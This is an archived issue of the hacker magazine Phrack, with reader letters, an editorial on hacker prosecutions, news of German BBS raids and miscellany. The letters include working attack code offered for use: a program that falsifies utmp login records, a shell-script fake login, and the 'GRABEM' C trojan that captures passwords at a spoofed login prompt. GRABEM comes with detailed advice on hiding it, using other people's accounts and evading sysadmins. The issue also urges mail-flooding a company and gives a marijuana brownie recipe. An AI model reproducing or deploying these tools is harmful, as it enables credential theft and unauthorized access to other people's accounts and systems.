home *** CD-ROM | disk | FTP | other *** search
Text File | 2003-06-11 | 46.5 KB | 1,115 lines |
- ==Phrack Magazine==
-
- Volume Four, Issue Forty-Two, File 2 of 14
-
- [-=:< Phrack Loopback >:=-]
- ============================================================================
- !!!!WATCH THIS SPACE FOR SUMMERCON INFORMATION NEXT ISSUE!!!!
- ============================================================================
-
- I 'found' this little C program a few days ago, and runs on most UNIX
- machines I think (As I found it, I cant claim fame for writing it!).
-
- What it does, is change your userid and x25 address to anything of your
- choice. This only affects programs such as 'write' and 'who'. It doesn't
- automatically give you different access rights, so it can only be used
- to disguise your real identity.
-
- Usage
- -----
-
- inv god somewhere (Changes your uid to 'god' and X.25 to 'somewhere')
- inv '' '' (Makes you INVISIBLE on 'who')
-
- Program invis.c
- ---------------
-
- #include <stdio.h>
- #include <utmp.h>
- #include <sys/types.h>
-
- #include <lastlog.h>
-
- main(argc,argv)
- int argc;
- char *argv[];
- {
- FILE *f;
- struct utmp u;
-
- int v=ttyslot(1);
- if(v==-1)
- {
- fprintf(stderr,"Can't find terminal.\n");
- exit(1);
-
- if(argc!=3)
- {
- fprintf(stderr,"Args!\n");
- exit(1);
- }
- f=fopen("/etc/utmp","r+");
- if(f==NULL)
- {
- fprintf(stderr,"Utmp has escaped!\n");
- exit(1);
- }
- if(fseek(f,v*sizeof(u),0)==-1)
- {
- fprintf(stderr,"Garbage utmp\n");
- exit(1);
- }
- if(fread((char *)&u,sizeof(u),1,f)!=1)
- {
- fprintf(stderr,"Write failed\n");
- exit(1);
- }
-
- strncpy(u.ut_name,argv[1],8);
- strncpy(u.ut_host,argv[2],16);
- if(fseek(f,v*sizeof(u),0)==-1)
- {
- fprintf(stderr,"Seek failed\n");
- exit(1);
- }
- fwrite((char *)&u,sizeof(u),1,f);
- fclose(f);
- }
-
- I personaly have not used this program (to hack or for anything else)
- What you do with it is up to you....,
- ________
- Have fun...., !!! ( )____
- ( Alas, life )
- ( is but an )
- ( Aardvaark.. )
- ( __ )
- . (_____) (____)
- * * * * * * * * * * * * * * * * . ? . ()
- * CHEERS_ THEN - _ _ * __ ()
- * ___/_/______|_|___| |__ * / \ ()
- * |________ _______| |__| * |_ _|
- * / / | | | | | | * |(0)||(0)|
- * / /___ | | | | | | * /|_ \/ _|\
- * /___ / | | | | | | * || | == | ||
- * / / | | \ \__/ / * || \____/ ||
- * / / |_| \____/ * ///\ !! /\\\
- *-*-/_/-*-*-*-*-*-*-*-*-*-*-*-*-=-=-=-=-=-=-=-=-!!!-!-=-=-!-!!!-=-=-=-=-=-=-=-=
-
- -------------------------------------------------------------------------------
-
- I am interested in getting in contact with hackers in Nord Italy
- (I am located in Torino). Do you know anybody ?
-
- Can you help TheNewHacker ??
-
- Thanks
-
- TheNewHacker
-
- [Editor: Actually, we are in the process of recruiting people to
- write for a compilation file on the hacking scenes in countries
- around the world. One person is working on Italy. Perhaps when
- this file is completed, you will be able to network through that
- information.
- If anyone in a country other than America is interested in
- contributing to this effort, please write us at:
- phrack@well.sf.ca.us ! ]
-
- -----------------------------------------------------------------------------
-
-
- hello, i must say i love your publication. I have a little kind of
- hack/phreak for you guys.
-
- When you approach a Red light, preferably at night with few cars around,
- continually flash your bright lights. This tricks the light into believing
- this a cop waiting behind traffic at the light thus changing the light after
- about 10 flashes. I discovered that after seeing several police officers turn
- on their lights before they hit lights and was amazed on how easily the light
- changed. If you have say, a Mag-lite the trick works if you point directly
- at the top of the post-light and the ones hanging right above red on verticals
- and right above yellow on horizontals.
-
- hope this helps etc. (i fucking hate those damn red lights)
-
- Dave.
-
- [Editor: I've actually tried this. It works on most major
- intersections]
-
- -----------------------------------------------------------------------------
-
- Hallo !
- I'd like to make just some addition to the APPENDIX A of the
- Racketeer's article "The POWER of Electronic Mail" - there are
- new guys in InterNET -> Russians (!). They have the awful
- connection, but it's cool team. So, add :
-
- .su kremvax.hq.demos.su
-
- And one more note, in the SMTP installed on the Sun Station I'm working
- on there isn't command TICK, but exist some strange like RSET and
- EXPN.
- Spy
-
- P.S. Sorry for my bad English.
-
- [Editor: Russia has a lot of computers online these days. Look for
- more on the Russian Internet in upcoming Phracks!]
-
- -----------------------------------------------------------------------------
-
- There is another, much simpler way to expand your password collection,
- other than tty spoofing. Why not just run a program that simulates the
- login process, and then leave it running on the console for an unsuspecting
- victim? A simple example is below. Execute by typing getpass:logout.
-
- --------File: getpass----------
- LOGIN=""
- PASSWD=""
- clear
- echo -n "login: "
- read LOGIN
- echo "$LOGIN" >name
- sleep 3
- echo -n "Password:"
- read PASSWD
- echo "$PASSWD" >password
- echo
- echo -n "Login incorrect"
- -------------------------------
-
- The only problem I have is that I don't know how to make it so that
- the password, when entered, isn't shown on the screen. I'm sure you
- can come up with a solution.
-
-
- [Editor: actually, someone kinda did. See the next letter]
-
- -----------------------------------------------------------------------------
-
- A Better UNIX Password Grabber
- by The K-Man
-
-
- I blame it entirely on boredom. Well, that and an acute case of end-
- of-semester neural gridlock. I was sitting in the lab a couple of years
- ago, my head leaning against a Sparc-2 display, my index finger hitting the
- return key over and over again at the login prompt. It was all my mind and
- body were capable of at the time. Then a little thought formed in the back
- of my mind: "You know, it would be pretty damn easy to write a program to
- imitate the behavior of this screen while grabbing user id's and passwords."
- So I logged in and started coding. Then I thought to myself, "You know, with
- a few extra lines of code and a couple of tricks, I could make this little
- guy almost completely undetectable and untraceable while running." So I
- coded some more. A couple of hours later, out popped the following
- program:
-
- ---------------------------- Cut Here -----------------------------------
-
- /*----------------------------------------------------------------------+
- | GRABEM 1.0 by The K-Man |
- | A Cute little program to collect passwords on the Sun workstations. |
- +----------------------------------------------------------------------*/
-
- #define PASSWORD "Password:"
- #define INCORRECT "\nLogin incorrect"
- #define FILENAME ".exrc%"
-
- #include <stdio.h>
- #include <signal.h>
-
-
- /*-----------------------------------------------------------------------+
- | ignoreSig |
- | |
- | Does nothing. Used to trap SIGINT, SIGTSTP, SIGQUIT. |
- +-----------------------------------------------------------------------*/
- void ignoreSig ()
- {
- return;
- }
-
-
- /*-----------------------------------------------------------------------+
- | Main |
- +-----------------------------------------------------------------------*/
- main()
- {
-
- char name[10], /* users name */
- password[10]; /* users password */
-
-
-
- int i, /* loop counter */
- lab, /* lab # you're running on */
- procid; /* pid of the shell we're under */
-
- FILE *fp; /* output file */
-
-
- /*-------------------------------------------------------------------+
- | Trap the SIGINT (ctrl-C), SIGSTP (ctrl-Z), and SIGQUIT (ctrl-\) |
- | signals so the program doesn't stop and dump back to the shell. |
- +-------------------------------------------------------------------*/
- signal (SIGINT, ignoreSig);
- signal (SIGTSTP, ignoreSig);
- signal (SIGQUIT, ignoreSig);
-
- /*-------------------------------------------------------------------+
- | Get the parent pid so that we can kill it quickly later. Remove |
- | this program from the account. |
- +-------------------------------------------------------------------*/
- procid = getppid();
- system ("\\rm proj2");
-
- /*-------------------------------------------------------------------+
- | Ask for the lab # we're running on. Clear the screen. |
- +-------------------------------------------------------------------*/
- printf ("lab#: ");
- scanf ("%d", &lab);
- for (i=1; i<40; i++)
- printf ("\n");
- getchar();
-
- /*-------------------------------------------------------------------+
- | Outer for loop. If the name is <= 4 characters, it's probably not |
- | a real id. They screwed up. Give 'em another chance. |
- +-------------------------------------------------------------------*/
- for(;;)
- {
- /*---------------------------------------------------------------+
- | If they hit return, loop back and give 'em the login again. |
- +---------------------------------------------------------------*/
- for (;;)
- {
- printf("lab%1d login: ",lab);
- gets (name);
-
- if (strcmp (name, "") != 0)
- break;
- }
-
- /*---------------------------------------------------------------+
- | Turn off the screen echo, ask for their password, and turn the |
- | echo back on. |
- +---------------------------------------------------------------*/
- system ("stty -echo > /dev/console");
- printf(PASSWORD);
- scanf("%s",password);
- getchar();
- system ("stty echo > /dev/console");
-
-
- /*---------------------------------------------------------------+
- | Write their userid and password to the file. |
- +---------------------------------------------------------------*/
- if ( ( fp = fopen(FILENAME,"a") ) != NULL )
- {
- fprintf(fp,"login %s has password %s\n",name,password);
- fclose(fp);
- }
-
- /*---------------------------------------------------------------+
- | If the name is bogus, send 'em back through |
- +---------------------------------------------------------------*/
- if (strlen (name) >= 4)
- break;
- else
- printf (INCORRECT);
- }
-
- /*-------------------------------------------------------------------+
- | Everything went cool. Tell 'em they fucked up and mis-typed and |
- | dump them out to the REAL login prompt. We do this by killing the |
- | parent process (console). |
- +-------------------------------------------------------------------*/
- printf (INCORRECT);
- kill (procid, 9);
- }
-
- ---------------------------- Cut Here -----------------------------------
-
-
- HOW IT WORKS
-
- You can probably figure this out by reading the code, but I thought I'd
- just add some comments on why I did what I did.
-
- The first thing is does is install the signal handler. All it does is trap
- SIGINT, SIGSTP, and SIGQUIT, so that the person trying to log into the machine
- this baby is running on can't kill it with a keystroke. Next, it gets the
- parent process ID. We'll use this later to kill it off quickly. Then it
- proceeds to erase the executable file. Sysadmins can't find a trojan horse
- program that isn't there.
-
- >From here it goes on to imitate the login and password prompts. You'll
- probably have to change the code to get it to imitate the login process on
- your particular machine.
-
- When it gets a userid and password, it appends them to an existing file in
- the account. I chose the .exrc, but any dot file will work. The point being
- to use a file that already exists and should be in the account. Don't leave
- any extra suspicious files lying around.
-
- After it writes the uid and password to the file, it bumps the user back
- to the real login prompt by killing off the shell that was the parent process
- of the program. The cut is almost instantaneous; the user would have to be
- inhumanly observant to notice the transition.
-
-
- HOW TO USE
-
- Well, first you need an account to run it from. If your site has guest accounts,
- you've got it made. If not, I'd suggest using a little social engineering to
- get one other person's account. With that account and the program, you can grab
- access to many more. I wouldn't recommend running it from an account that has
- your name on it. That just makes it a little more dangerous than it needs to be.
- Of course, if the sysadmin happens to catch the program running on your login,
- you can always claim to know nothing. Say someone else must have gotten your
- password and is using your account to escape detection. He might buy it. But
- if you have the source for the program sitting somewhere in your account, and
- they find it, you're fucked. So it's best to use someone else's account for
- the job.
-
- After you've gotten the account you'll be running it from, you'll need to get
- the program in that account somehow. I started off by keeping a copy of the
- source somewhere it my account, named with something innocuous and hidden
- among bunches of source files, but I got paranoid and started hauling the source
- around with me on a bar floppy. Do whatever suits your level of paranoia.
-
- Copy the source to the account you'll be running it from and compile it.
- Trash the source, and name the program something that won't stand out in a
- ps list. selection_svc is a nice innocuous name, and it appears everywhere.
- Do a ps on one of your machines and look for processes that hang around for
- a long time. You might want to hide it as a daemon. Be creative.
-
- Now run the program and sit back and wait. Or leave and come back later.
- When you know that someone has tried to log on to your booby trapped machine,
- log back into the account you borrowed to run the program in and vi or emacs (if
- you're that kind of person) out the captured userid and password. Simple as
- that.
-
- Note that the two times that you stand the greatest chance of being caught
- are when you first compile and run the program and when you retrieve your
- captured uid and passwords. There's the remote chance that someone might see
- you at work and see what you're doing, but it's not very likely. If you start
- acting all paranoid you'll draw more attention to yourself than you would have
- gotten in the first place. If your site has dialup lines, you might want to do
- a dialin to retrieve the passwords. Or you might prefer to do it in person.
- All depends on your paranoia quotient which you think is more secure, I guess.
-
-
- TIPS
-
- Be careful which dot files you use. I chose the .exrc because it was something
- that wasn't used often at our site. If you chose the .cshrc or other frequently
- accessed file, put a # before the uid and password you write to that file. That
- way, when that dot file is sourced, it'll treat that line as a comment and not
- spit out an error message that could cause suspicion.
-
- Try to run the program at a time when you know there will be heavy machine
- usage. That way you'll trap something quick. The longer your program
- runs, the greater the chance it will be found.
-
- Don't be greedy. Run on only one or two machines at a time. And if you run
- on more than one machine, run out of a different account on each one. Again,
- the more you put out there, the better the chance that at least one will be
- found.
-
-
- PARTING NOTE
-
- The morning after I wrote this program was the first time I got to use it. I
- set it running on a guest account, the went to a machine across the room to
- do some legitimate work. One of my friends walks in shortly after that, and
- we start shooting the shit. A minute or two later, the sysadmin walks in, sits
- down, and logs in to the machine I ran the program on. I came really close to
- dropping my fudge right then and there. The only thing running through my
- mind was "Either I'm totally fucked, or I have root." Turned out it was choice
- B. Too bad the guy changed his password once a week, and I wasn't smart enough
- to fix it so that I would see the change. Oh well, I had fun for a week though.
- There were quite a few interesting e-mail messages sent back and forth that week.
- I think the best one was the one from our (male) department head to one of our
- radical she-male hard-core no-damn-gifs feminist female professors, detailing
- all the perverted sexual acts that he would like to perform with and on her. :)
-
- Anyway, have fun with the program. Maybe I'll get a chance to come up with
- some more cool UNIX programs in the future.
-
-
- Later,
- K-Man
-
- -----------------------------------------------------------------------------
-
- In a recent issue of PHRACK you had some article or loopback about
- getting information about people via modem. I am somewhat interested in
- this and could use this information. I have a friend who is a part-time
- bounty hunter and could use such information to track people down.
- Could you please send me some information about who to contact to find out
- this information. What I could REALLY use is an on-line up-to-date
- phone/address book that I could call to find out anybody's address. Is
- there such a thing? If you have any information please e-mail me, since I
- am unable to get your mag on a regular basis. Thanx a mil!
-
- Scarface
-
- [Editor: Actually there are quite a large number of databases that keep
- information on everyone. There is TRW, Equifax, TransUnion,
- Information America and NAI just to name a few. Many of these
- services are very expensive, but even services like CompuServe
- allow users to look up people all over America using
- PhoneFile which compiles data from all kinds of public
- records. Nexis can allow you to look up real estate data on
- just about anyone with loans on their houses. Every public
- utility and department of motor vehicles provides information
- on their records, and many are online.
-
- A good book to read about this kind of thing is
-
- Privacy For Sale
- Jeffrey Rothfeder
-
- Simon & Schuster
- $22.00]
- -----------------------------------------------------------------------------
- THE GOLDEN ERA REBORN!
-
- Relive the thrill of the golden era of hacking through our exclusive
- collection of BBS messages. Our collection contains posts from
- over 40 of the most popular hack/phreak BBSes of all time.
- Experience the birth of the computer underground again from your
- own computer with this collection of original posts from bulletin
- boards like:
-
- * 8BBS *
- * OSUNY *
- * PLOVERNET *
- * THE LEGION OF DOOM *
- * BLACK ICE PRIVATE *
- * THE PHOENIX PROJECT *
-
- And many more...
-
- Messages are available in many computer formats:
- IBM
- Amiga
- Macintosh
-
- For more information, please contact LOD Communications
-
- email: lodcom@mindvox.phantom.com
-
- US Mail: LOD Communications
- 603 W. 13th St.
- Suite 1A-278
- Austin, TX 78701
-
- Voice Mail: 512-448-5098
- -----------------------------------------------------------------------------
-
- You might like this one...
- --bob
- ****************************************
- I just saw a transcript of a press conference given by
- Secret Service Agent Frericks, in Lubbock last December.
-
- here is a brief extraction...
-
- FRERICKS: Um hm. This is a major nation wide, world wide problem from
- an industry point of view with tremendous losses in funds tremendous
- losses of money. the VAX account at the University is a way to get
- into numerous other research accounts or Internet which is the ...you
- get onto Internet you can talk to anybody else who is on Internet
- anywhere in the world which these kids were talking to Belgium, and
- Israel and Australia and they can do that just by this, thus avoiding
- long distance phone calls. But most of the people on Internet I mean
- on the VAX are there legitimately for research purposes they can go to
- Mayo and get a file if they're a med student and they also get one of
- these pamphlets if they get, like the Department of Engineering gives
- out an account number just for that semester, the professor would give
- it out so you can use the VAX well they also get one of those
- pamphlets that explains what the rules are and the instructor spends a
- good bit of time the first couple of classes going over computer
- etiquette, computer rules.
-
- [Editor: Another of America's finest.]
-
- -----------------------------------------------------------------------------
-
-
- I typed this because of the mention of Software Security International in
- the article "More than $100,000 in Illegal Software Seized" in Rambone's
- Pirates Cove in Phrack 41.
- He mentioned that they were the investigators that finally brought down
- APL. I am not only familiar with that, a past friend of mine was
- there when the Marshalls took the board. He was there as representative of
- SSI.
- The best part that Rambone didn't know, was that they couldn't get into
- APL to verify the existence of the software, until they got the password
- breaker from Novell. So in essence, they looked like some dumb fools.
- They didn't have any idea on how to approach the network.
-
- Software Security International Can be reached at...
- 1-800-724-4197
-
- 2020 Pennsylvania Avenue N.W.
- Suite 722
- Washington, D.C. 20006-1846
-
- That is of course if they finally have gotten off the ground. Last I Heard (2-3
- months ago) they were still having trouble getting Financial Backing. They did
- the APL Bust for nothing, just to prove they could do it. They are also on a
- lot of other BBS's around America. So as a warning to other sysops, Cover your
- Ass.
-
- You could rack up some serious negative cash flow by sending tons of
- mail to the box above, then it gets Airborne'd to Washington State.
-
- see ya
-
- [Editor: I think it might be a good idea to send them a few postcards
- every day for the next few weeks. Just to stay in touch.]
- -----------------------------------------------------------------------------
-
- ==Phrack Magazine==
-
- Volume Four, Issue Forty-Two, File 2b of 14
-
- [-=:< Editorial >:=-]
-
- Before I jump upwards onto my soapbox and spew forth a meaty
- editorial I would like to relay something to the readers of Phrack.
- The following is a transcript of John Lee's (Corrupt's) confession
- to the charges facing him. (From Security Insider Report, Jan. 1993)
-
- What follows is in my opinion a very poor attempt at a plea-bargain,
- and obviously induced by attorney coercion. I must wonder what John
- was thinking when he agreed to this admission.
- ======================================================================
-
- I agreed with others to violate various laws related to the use of
- computers. I agreed to do the following:
-
- 1) I agreed to possess in excess of fifteen passwords which
- permitted me to gain access to various computer systems
- including all systems mentioned in the indictment and others.
- I did not have authorization to access these systems. I knew
- at the time that what I did was wrong.
-
- 2) I used these access devices and in doing so obtained the value of time
- I spent within these systems as well as the value of the passwords
- themselves which I acknowledge was more than $1000.
-
- 3) I intentionally gained access to what I acknowledge are Federal interest
- computers and I acknowledge that work had to be done to improve the
- security of these systems which was necessitated by my unauthorized
- access.
-
- 4) I was able to monitor data exchange between computer systems and by
- doing so intentionally obtained more passwords, identifications and
- other data transmitted over Tymnet and other networks.
-
- 5) I acknowledge that I and others planned to share passwords and
- transmitted information across state boundaries by modem or telephone
- lines and by doing so obtained the monetary value of the use of the
- systems I would otherwise have had to pay for.
-
- Among the ways I and others agreed to carry out these acts are the following:
-
- 1. I was part of a group called MOD.
-
- 2. The members of the group exchanged information including passwords
- so that we could gain access to computer systems which we were not
- authorized to access.
-
- 3. I got passwords by monitoring Tymnet, calling phone company
- employees and pretending to be computer technicians, and using
- computer programs to steal passwords.
-
- I participated in installing programs in computer systems that would give
- the highest level of access to members of MOD who possessed the secret
- password.
-
- I participated in altering telephone computer systems to obtain
- free calling services such as conference calling and free billing
- among others.
-
- Finally, I obtained credit reports, telephone numbers and addresses
- as well as other information about individual people by gaining access
- to information and credit reporting services. I acknowledge that on
- November 5, 1991, I obtained passwords by monitoring Tymnet.
-
- I apologize for my actions and am very sorry for the trouble I have
- caused to all concerned.
-
- John Lee
-
-
- ==========================================================================
-
-
- This issue I would like to call attention to what I consider to be
- a very pressing issue. There has always been a trend to pad the
- amount of dollar damages incurred to any victim of a hacker attack.
- I personally feel that the blame is never directed at the true guilty
- parties.
-
- Certainly, if someone is caught breaking into a system, then they are
- surely guilty of some form of electronic trespass. I will also
- concede that such a person may or may not be guilty of other crimes
- based upon their actions once inside that system. What I have the
- most problems dealing with is the trend to blame the hacker for any
- expenditures needed to further secure the system.
-
- With this mindset, why should any corporation bother to add any
- security at all? Why not just wait until someone happens across
- a few poorly secured sites, nab them, and claim damages for the
- much needed improvements in security?
-
- The worst culprits in this type of behavior has been the RBOCs. As was
- seen with the supposed damages incurred for the distribution of the
- "911 document" and most recently with the $370,000 damages supposedly
- incurred by Southwestern Bell resulting from the alleged activities
- of those in MOD.
-
- Perhaps this figure does have some basis in reality, or perhaps it is
- just an arbitrary figure dreamed up by a few accountants to be used
- at year end to explain some losses in the corporate stock report.
- Most often figures such as this factor in such ridiculous items as
- the actual system hardware penetrated. I can hardly see the relevance
- of such a charge.
-
- Even if these charges are to be believed, why isn't the blame being
- evenly distributed? Why aren't stockholders crying for the heads of
- system administrators, MIS managers and CIOs? These are the people who
- have not adequately done their jobs, are they not? If they had expended
- a bit of time, and a small amount of capital, the tools exist to make
- their systems impervious to attack. Period.
-
- If I had an investment in a company such as Southwestern Bell, I would be
- outraged that the people I was employing to perform data security
- functions were not apt enough to keep a group of uneducated gangsters
- out of their switching systems. Why haven't there been any emergency
- meetings of shareholders? Why isn't anyone demanding any changes in policy?
- Why is everyone still employed?
-
- Not to blame Southwestern Bell too harshly, they were sorely outclassed
- by MOD, and had absolutely no way to cope with them. Not only because MOD
- were competent telco hackers, but because Southwestern Bell's network
- service provider had given them free reign.
-
- Southwestern Bell's packet switched network, Microlink II, was designed
- and implemented for SWBT by Tymnet (then owned by McDonnell Douglas).
- An interesting thing I've heard about SWBNET, and about every other subnet
- arranged by Tymnet, is that the information concerning gateways, utilities,
- locations of node code, etc., is purported to be located in various
- places throughout Tymnet internal systems. One such system, was described
- to me as a TYMSHARE system that contained data files outlaying every subnet
- on Tymnet, the mnemonics (username/password pair) to each utility, gateway,
- and the ONTYME II mail access keys.
-
- If this information is correct, then shouldn't Tymnet be called in to
- acknowledge their role in the attacks on Southwestern Bell?
-
- Let's say a Realtor sold you a house, but told you that he would be keeping
- copies of all your keys so that he could help you with the maintenance.
- Some time later, you notice that a few of your books have been read, but
- nothing else is disturbed. Later on you notice that your tv is on and your
- bed is all messed up. A week later your stereo is gone. You set up a trap
- and catch someone going into your house with your own key! You find that
- the burglars had made copies of all the keys held by your Realtor. You
- then find that the Realtor neglected to put the keys in a safe, and in fact
- had left them lying around on the table in his back yard labeled with
- the addresses they corresponded to.
-
- Who would you be more upset with? The individual who copied and used the
- keys, or the Realtor for not providing the access to your valuables more
- vigilantly? I would personally be far more upset with the Realtor, for
- if he had put the keys in a safe this event would have probably never
- transpired.
-
- I'm not saying that people who get caught for breaking into computer
- systems should be let go, especially if they can be proven to be involved
- in the sale of hacked information for a personal profit. What I am saying
- that if hackers are to be punished so vigorously for what I view as a
- predominantly victimless crime, then everyone should have to line
- up and take their fair share of the blame.
-
- I think it's high time that the real blame be placed on the corporate
- entities who seemingly refuse to acknowledge their role in these
- break-ins. Neglect of duties and lack of responsibility on the part
- of the employees, the interconnect carriers, the data network providers,
- the hardware vendors, etc. all play a key role in the problems that
- exist in the world's data networks today. In fact, if it were not for
- computer hackers, these problems would continue to lie dormant until either
- discovered by accident in the field, or the provider decided to go ahead
- and illuminate its clients to the existence of such a problem.
-
- I wholeheartedly encourage each and every reader of Phrack to
- purchase one share of stock in any corporation you know that has exhibited
- such tendencies and take your place on the floor of the next shareholders
- meeting and scare the hell out of the board of directors.
- Phrack Magazine is calling a discount brokerage very soon.
-
- -------------------------------------------------------------------------------
-
- ==Phrack Magazine==
-
- Volume Four, Issue Forty-Two, File 2c of 14
-
-
- // // /\ // ====
- // // //\\ // ====
- ==== // // \\/ ====
-
- /\ // // \\ // /=== ====
- //\\ // // // // \=\ ====
- // \\/ \\ // // ===/ ====
-
- ******************************************************************************
-
- BBS Busts in Germany
- ====================
-
-
- Thursday, March 18, 1993.
-
- This day will be remembered as a black day in German BBS history.
- In fact, it was the blackest day in German BBS history since the raid
- of 18 Berlin BBS in Berlin and North Germany a couple of months ago.
-
- What has happened? A couple of Bulletin Board Systems (BBS) have
- been raided by the police. All these BBS had "warez" online, illegal,
- pirated, copyrighted Software - usually for PC/MSDOS and Amiga.
- This time, most of these BBS were in Bavaria, South Germany.
-
- Now let's take a closer look at the events:
-
- One guy who got busted was MST, Sysop of Southern Comfort BBS
- in Munich. In fact, his board went offline 9 days before.
- But he was so unlucky still having his computer and his warez.
- He was even using his modem to trade warez at the very moment
- the cops rang his doorbell. Why did he go offline just so short
- before he got busted? His board had been running for over 1 year.
-
- Here is the text file MST released about going offline:
-
- THURSDAY 03-09-93 00:15
- THE SOUTHERN COMFORT BBS IS CLOSED !
- I AM NOT BUSTED OR ANYTHING LIKE THIS !
- I CLOSED THE BBS COS OF PERSONAL REASONS AND
- PERHAPS IT WILL BE OPENED AGAIN IN 1 OR 2 MONTH !
- I HOPE YOU WOULD UNDERSTAND THIS DECISION BUT SCENE
- IS NOT ALL WHAT LIFE CAN BE ALL USER ACCOUNTS STAY
- ALIVE AND WILL BE HERE AT A NEW??? OPENING !
-
- SO I SAY BYE TO THE SCENE FOR PERHAPS ONLY A SHORT TIME !
-
- MST/RAZOR 1911
-
- A couple of days later, MST was posting ads in local BBS to sell his
- old equipment. But obviously he wasn't fast enough. Maybe this was
- one of the reasons the cops busted him on March, 18. They were afraid
- he might get rid of his illegal software, so they hurried up to catch him!
-
- He got busted at 10am this morning. Three cops were knocking on his door,
- until he opened. They had a search warrant and confiscated all his
- computer equipment, disks, modems...
-
- Chris used to have a board until four months ago, and now trades for TDT and
- other groups. He was in school this morning. His parents weren't home
- either. So the cops broke into his house, smashed the wooden door, and
- seized all his equipment. He is asked to speak to the Police this Tuesday.
-
- Chris used to be one of the most active traders for PC warez in Germany.
- He and his friend Michelangelo supported boards like Schizophrenia and
- Beverly Hills, which they co-sysop'ed. They were also known as the
- 'Beverly Hills Boys', a new German cracking group.
-
- After Chris' bust, a couple of boards were affected:
- Beverly Hills went offline. Also the German Headquarters of the Beverly
- Hills Boys, 'Twilight Zone', went offline. Their sysops estimate at least
- 1-3 months offline time.
-
- The other Munich BBS and their sysops were really scared after the bust
- and took down their systems for an uncertain amount of time.
-
- One of Germany's largest BBS, Darkstar in Augsburg, was a heaven for
- every warez collector. It had 8 modems hooked up (all US Robotics Dual
- Standard 16.8) and one ISDN Line.
-
- It had over 2 GB PC warez online, and over 7 GB offline on tapes, which
- would be put online according to user' requests.
-
- But then, March 18 arrived, and the dream was shattered.
- Its sysop, Rider, who was happily calling boards the previous day,
- had the most shocking experience in his life. The cops came and
- took his BBS.
-
- And more..
- Ego, co-sysop of a large German BBS, got busted.
- Andy/Spreadpoint (ex-sysop) got busted.
- And lots of others...
-
- Unlike the US Secret Service, which delights in seizing all
- electronic equipment, like stereos, TVs, VCRs, the German cops
- were just after the computer hardware, especially the hard drives
- and file servers.
-
- They usually come with three or four people. All of the search warrants
- they were using were quite old, issued last December.
-
- Who is behind those actions?
- First of all the BSA, Business Software Association. They
- were also responsible for the recent raids of US Bulletin Boards.
- In Germany they just announced actions against piracy and
- bulletin boards. The most active BSA Members are Microsoft and
- Lotus Development. Microsoft, Lotus and the BSA are all located
- in Munich, Germany, home of German's most feared lawyer,
- Guenther Freiherr von Gravenreuth. This guy has been fighting
- for years against piracy, young kids who copy games, and especially
- bulletin board systems. He is also affiliated with Ariolasoft, a huge
- German distributor for game labels like Activision and others.
-
- In the end, all I can say is:
- Be aware, don't get caught and don't keep illegal stuff on your board!
-
- (c) 1993 SevenUp for Phrack
-
- ******************************************************************************
-
- Carlcory's brownies:
-
- /* Begin cc_brownie.c */
-
- Includes:
- #include "4_squares_baking_chocolate"
- #include "1_cup_butter"
- #include "2_cups_sugar"
- #include "4_eggs"
- #include "2_cups_flour"
- #include "2_tbs_vanilla"
- #include "1_third_cup_marijuana" /*comment out if won't compile
- on your system*/
- #include "1_cup_nuts" /*comment out if won't compile*/
-
- void main(void);
-
- {
- heat(oven, 350);
- add(butter, chocolate);
- while(texture!='smooth') {
- stir(mixture);
- }
- Add(sugar);
- add(eggs);
- add(vanilla);
- add(flour, pot);
- add(nuts)
- for(timer=0; timer<35; timer++) {
- bake(mixture);
- }
- cool(hour);
- }
-
-
- /*The high takes about an hour to come on,
- but lasts for 12 hrs. (4 brownies)
- Make sure they cool (don't burn your mouth!)
- and share with friends! */
-
-
- /*End of cc_brownie.c*/
-
- ******************************************************************************
-
- GRAY AREAS
- Examining the Gray Areas of Life
-
- Gray Areas, Inc.
- P.O. Box 808
- Broomall, PA 19008-0808
- (215)353-8238
- grayarea@well.sf.ca.us
-
-
- Gray Areas is published quarterly and printed on recycled paper. They also
- participate in local recycling efforts involving cans, glass, clothing,
- newspapers, and more.
-
- A four-issue subscription costs $18.00 US or $26.00 foreign (payable in US
- funds). A 12-issue subscription costs $50.00 ($75.00 foreign). You may
- purchase a twelve issue subscription and give 4 or 8 or those issues away as
- gifts to friends (i.e., the same 4 issues you receive would also go to 2 other
- recipients). Make check or money order out to Gray Areas, Inc.
-
- STATEMENT OF PURPOSE:
-
- Gray Areas exists to examine the gray areas of life. We hope to unite people
- involved in all sorts of alternative lifestyles and deviant subcultures. We
- are everywhere! We felt that the government has done a great job of splitting
- people up so that we do not identify with other minority groups anymore. There
- are so many causes now that we often do not talk to others not directly
- involved in our chosen causes. We believe that the methods used to catch
- criminals are the same regardless of the crime and that much can be learned by
- studying how crimes in general are prosecuted and how people's morals are
- judged. It is our mission to educate people so they begin to case more about
- the world around them. Please join our efforts by subscribing, advertising your
- business with us, and by spreading the word about what we're up to.
-
- __________________________
-
- Review by Knight Lightning:
-
- I recently received a copy of the premier issue of Gray Areas, dated Fall 1992
- and with a cover price of $4.50 (US). I was impressed with both the laser
- quality of the printing, artwork, and graphics, as well as the topics and
- content of the articles.
-
- I would not characterize Gray Areas as a hacker magazine, but the subject did
- come up in an interview with John Perry Barlow (one of the original founders of
- the Electronic Frontier Foundation) where he discussed the EFF and its role in
- defending civil liberties.
-
- No, instead I think it is safe to say that Gray Areas pays a lot of attention
- to the Grateful Dead. Indeed the cover story is titled "Grateful Dead
- Unauthorized Videos." Additionally, there are several other articles
- (including the John Barlow interview) that discuss varying aspects about the
- Dead's history, their politics, and of course their music. An advertisement
- for the next issue of Gray Areas reveals that even more articles relating to
- the Grateful Dead are on the way; so if you are a "Dead Head" you will probably
- fall in love with this magazine!
-
- However, the article that I appreciated most was "Zine Scene," a review of 163
- alternative newsletters that included such familiar names as 2600, Hack-Tic,
- Full Disclosure, and TAP; and others that I intend to take a look at like Iron
- Feather's Journal and bOING bOING. The zines reviewed here covered every topic
- imaginable and I thought it was a great buffet for the mind to have such handy
- directory (especially since Factsheet Five went defunct about a year ago).
-
- Other interesting articles had to do with video, audio, and software piracy and
- reviews of music and software. I also enjoyed the great artwork found
- throughout the magazine in the form of visual aids, comics, and advertisements.
-
- If you are a fan of alternative music or the Grateful Dead, you'll be very
- sorry if you don't subscribe immediately. If you are interested in alternative
- publications with more interesting points of view than Time or Newsweek then
- you owe it to yourself to at least purchase a copy to check it out.
-
- - - - - - - - - -
-
- All letters sent to Gray Areas are presumed to be for publication unless you
- specifically request that they omit your name or refrain from publishing your
- comments. If you are writing about something which could incriminate yourself,
- they will protect your identity as a matter of policy.
-
- ******************************************************************************
-
- "Turning your USR Sportster w/ 4.1 roms
- into a 16.8K HST Dual Standard"
-
- by
-
- The Sausage with The Mallet
-
-
